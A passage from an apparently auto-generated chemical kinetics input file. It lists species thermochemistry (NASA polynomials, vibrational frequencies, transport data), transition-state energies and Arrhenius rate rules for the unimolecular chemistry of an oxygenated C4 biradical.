thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.06955,0.0733406,-0.000105669,1.00457e-07,-3.86519e-11,-27015.2,29.3685], Tmin=(100,'K'), Tmax=(804.875,'K')), NASAPolynomial(coeffs=[2.87276,0.0466262,-2.27974e-05,4.41143e-09,-3.07546e-13,-26730.4,24.6327], Tmin=(804.875,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-225.423,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(340.893,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCOJ)"""),
)
species(
label = '[CH2]CC([O])C(O)O(11584)',
structure = SMILES('[CH2]CC([O])C(O)O'),
E0 = (-241.226,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.759501,0.072888,-7.5304e-05,4.23075e-08,-9.72939e-12,-28897.4,30.3643], Tmin=(100,'K'), Tmax=(1042.29,'K')), NASAPolynomial(coeffs=[12.0388,0.0296014,-1.30086e-05,2.46225e-09,-1.72257e-13,-31248.6,-24.5189], Tmin=(1042.29,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-241.226,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(RCCJ) + radical(CC(C)OJ)"""),
)
species(
label = 'CCC(=O)C(O)O(11585)',
structure = SMILES('CCC(=O)C(O)O'),
E0 = (-618.099,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.02234,0.0705871,-8.08298e-05,5.65228e-08,-1.6894e-11,-74237.5,26.8196], Tmin=(100,'K'), Tmax=(798.77,'K')), NASAPolynomial(coeffs=[7.80593,0.0366172,-1.70385e-05,3.28189e-09,-2.30677e-13,-75321.2,-4.38318], Tmin=(798.77,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-618.099,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + group(Cds-OdCsCs)"""),
)
species(
label = 'CCC(O)C(=O)O(11586)',
structure = SMILES('CCC(O)C(=O)O'),
E0 = (-662.671,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.07784,0.0535222,-1.82359e-05,-1.29262e-08,8.07037e-12,-79586.5,28.2489], Tmin=(100,'K'), Tmax=(1053.49,'K')), NASAPolynomial(coeffs=[13.9276,0.0265369,-1.0858e-05,2.05067e-09,-1.45803e-13,-83503.9,-40.1556], Tmin=(1053.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-662.671,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-(Cds-O2d)H) + group(Cs-(Cds-O2d)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs)"""),
)
species(
label = 'CH2(S)(23)',
structure = SMILES('[CH2]'),
E0 = (419.862,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1369.36,2789.41,2993.36],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19195,-0.00230793,8.0509e-06,-6.60123e-09,1.95638e-12,50484.3,-0.754589], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.28556,0.00460255,-1.97412e-06,4.09548e-10,-3.34695e-14,50922.4,8.67684], Tmin=(1000,'K'), Tmax=(3000,'K'))], Tmin=(200,'K'), Tmax=(3000,'K'), E0=(419.862,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'CC([O])C([O])O(1195)',
structure = SMILES('CC([O])C([O])O'),
E0 = (-196.987,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,359.579,359.579,2096.64],'cm^-1')),
HinderedRotor(inertia=(0.0013038,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0993115,'amu*angstrom^2'), symmetry=1, barrier=(9.11202,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0993116,'amu*angstrom^2'), symmetry=1, barrier=(9.11203,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (90.0779,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4514.4,'J/mol'), sigma=(7.28306,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=705.14 K, Pc=26.52 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.85156,0.0526616,-5.32421e-05,2.76846e-08,-2.87383e-12,-23619.7,23.9972], Tmin=(100,'K'), Tmax=(591.684,'K')), NASAPolynomial(coeffs=[6.00514,0.0310489,-1.48461e-05,2.8955e-09,-2.05023e-13,-24224.4,5.1816], Tmin=(591.684,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-196.987,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CC(C)OJ)"""),
)
species(
label = 'CCC1OOC1O(11396)',
structure = SMILES('CCC1OOC1O'),
E0 = (-276.146,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.19458,0.0582869,-3.95475e-05,1.34734e-08,-1.88331e-12,-33109.3,21.7624], Tmin=(100,'K'), Tmax=(1622.24,'K')), NASAPolynomial(coeffs=[13.1877,0.0287151,-1.22038e-05,2.23629e-09,-1.51571e-13,-37000.4,-41.8995], Tmin=(1622.24,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-276.146,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(345.051,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + ring(12dioxetane)"""),
)
species(
label = 'CCC([O])[CH]OO(11587)',
structure = SMILES('CCC([O])[CH]OO'),
E0 = (13.8464,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.743165,0.0765238,-8.37386e-05,5.28236e-08,-1.40297e-11,1778.42,27.0919], Tmin=(100,'K'), Tmax=(897.413,'K')), NASAPolynomial(coeffs=[9.69334,0.0366321,-1.70631e-05,3.29385e-09,-2.32244e-13,171.958,-15.1191], Tmin=(897.413,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(13.8464,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CC(C)OJ) + radical(CCsJOOH)"""),
)
species(
label = 'CCC([CH][O])OO(11588)',
structure = SMILES('CCC([CH][O])OO'),
E0 = (0.906094,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.425371,0.0869197,-0.000128701,1.13583e-07,-4.04154e-11,229.684,28.6673], Tmin=(100,'K'), Tmax=(810.148,'K')), NASAPolynomial(coeffs=[6.88216,0.0416622,-2.01367e-05,3.86375e-09,-2.67722e-13,-377.483,1.58595], Tmin=(810.148,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(0.906094,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOH) + radical(CCOJ)"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29226.7,5.11107], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29226.7,5.11107], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CC[CH]C([O])O(4406)',
structure = SMILES('CC[CH]C([O])O'),
E0 = (-78.7553,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1277.5,1000,1380,1390,370,380,2900,435,1427.31,1427.42,4000],'cm^-1')),
HinderedRotor(inertia=(0.074453,'amu*angstrom^2'), symmetry=1, barrier=(8.12427,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0744914,'amu*angstrom^2'), symmetry=1, barrier=(8.12436,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0744491,'amu*angstrom^2'), symmetry=1, barrier=(8.12399,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.236618,'amu*angstrom^2'), symmetry=1, barrier=(25.7923,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.02234,0.0485528,-3.27868e-05,1.24809e-08,-2.21444e-12,-9405.25,25.9259], Tmin=(100,'K'), Tmax=(1169.87,'K')), NASAPolynomial(coeffs=[5.75468,0.0357914,-1.64243e-05,3.15664e-09,-2.21871e-13,-10278.5,7.33389], Tmin=(1169.87,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-78.7553,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCJCO) + radical(CCOJ)"""),
)
species(
label = 'CCC([O])[CH]O(10835)',
structure = SMILES('CCC([O])[CH]O'),
E0 = (-65.9433,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1277.5,1000,1380,1390,370,380,2900,435,180,1036.54,2741.46],'cm^-1')),
HinderedRotor(inertia=(0.595264,'amu*angstrom^2'), symmetry=1, barrier=(13.6863,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.595356,'amu*angstrom^2'), symmetry=1, barrier=(13.6884,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.595443,'amu*angstrom^2'), symmetry=1, barrier=(13.6904,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0645559,'amu*angstrom^2'), symmetry=1, barrier=(13.6905,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.06969,0.0666253,-7.11628e-05,4.30287e-08,-1.0743e-11,-7827.45,24.5489], Tmin=(100,'K'), Tmax=(961.834,'K')), NASAPolynomial(coeffs=[10.1275,0.0289564,-1.24177e-05,2.31139e-09,-1.59832e-13,-9569.88,-18.7974], Tmin=(961.834,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-65.9433,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOH) + radical(CC(C)OJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (-220.767,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (-91.1317,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (-160.641,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (-158.171,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (-142.865,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (-198.929,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (-30.1541,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (-55.0967,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (-62.7306,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (-145.664,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (-145.486,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (-145.486,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (-166.877,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (-162.201,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (-115.126,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (-188.927,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (138.505,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (-157.367,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (-157.367,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (222.875,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (-212.483,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS22',
E0 = (106.591,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS23',
E0 = (108.017,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS24',
E0 = (164.249,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS25',
E0 = (177.062,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['HOCHO(59)', 'C2H5CHO(70)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(3)', 'CCC(=O)C([O])O(11574)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(0.0366254,'m^3/(mol*s)'), n=1.743, Ea=(71.4418,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsCs_O;YJ] for rate rule [CO-CsCs_O;HJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['H(3)', 'CCC([O])C(=O)O(11575)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(1.83701,'m^3/(mol*s)'), n=1.71338, Ea=(46.5052,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [CO_O;HJ] + [CO-NdNd_O;YJ] for rate rule [CO-NdNd_O;HJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['C2H5(29)', '[O]C(O)C=O(4774)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(7.94e+10,'cm^3/(mol*s)'), n=0, Ea=(28.0328,'kJ/mol'), T0=(1,'K'), Tmin=(333,'K'), Tmax=(363,'K'), comment="""Estimated using template [CO_O;CsJ-CsHH] for rate rule [CO-CsH_O;CsJ-CsHH]
Euclidian distance = 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['C2H5CHO(70)', '[O][CH]O(171)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(0.0201871,'m^3/(mol*s)'), n=2.2105, Ea=(56.0866,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsH_O;YJ] for rate rule [CO-CsH_O;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['HOCHO(59)', 'CC[CH][O](563)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(6.87291,'m^3/(mol*s)'), n=1.39198, Ea=(57.1551,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [CO_O;CJ] + [CO-NdH_O;YJ] for rate rule [CO-NdH_O;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['OH(5)', 'CCC([O])C=O(10833)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(0.04245,'cm^3/(mol*s)'), n=3.486, Ea=(94.7258,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1600,'K'), comment="""Estimated using template [CO-CsH_O;OJ] for rate rule [CO-CsH_O;OJ_pri]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction8',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CC[C](O)C([O])O(11576)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(4.56178e+08,'s^-1'), n=1.25272, Ea=(165.67,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Y_rad_out;Cs_H_out_Cs2] for rate rule [R2H_S;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction9',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC([O])[C](O)O(11577)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(1.43381e+07,'s^-1'), n=1.70481, Ea=(158.036,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Y_rad_out;Cs_H_out_NonDe] for rate rule [R2H_S;O_rad_out;Cs_H_out_NDMustO]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['C[CH]C(O)C([O])O(11578)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(5.71,'s^-1'), n=3.021, Ea=(105.562,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 319 used for R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction11',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(O)[C]([O])O(11579)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(111914,'s^-1'), n=2.27675, Ea=(75.2806,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;O_rad_out;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction12',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CC[C]([O])C(O)O(11580)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(111914,'s^-1'), n=2.27675, Ea=(75.2806,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;O_rad_out;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction13',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['C[CH]C([O])C(O)O(11581)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(210000,'s^-1'), n=1.76, Ea=(53.8899,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 326 used for R4H_SSS;O_rad_out;Cs_H_out_H/NonDeC
Exact match found for rate rule [R4H_SSS;O_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['[CH2]CC(O)C([O])O(11582)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(8.6e-09,'s^-1'), n=5.55, Ea=(83.68,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 340 used for R4H_SSS;C_rad_out_2H;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_2H;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
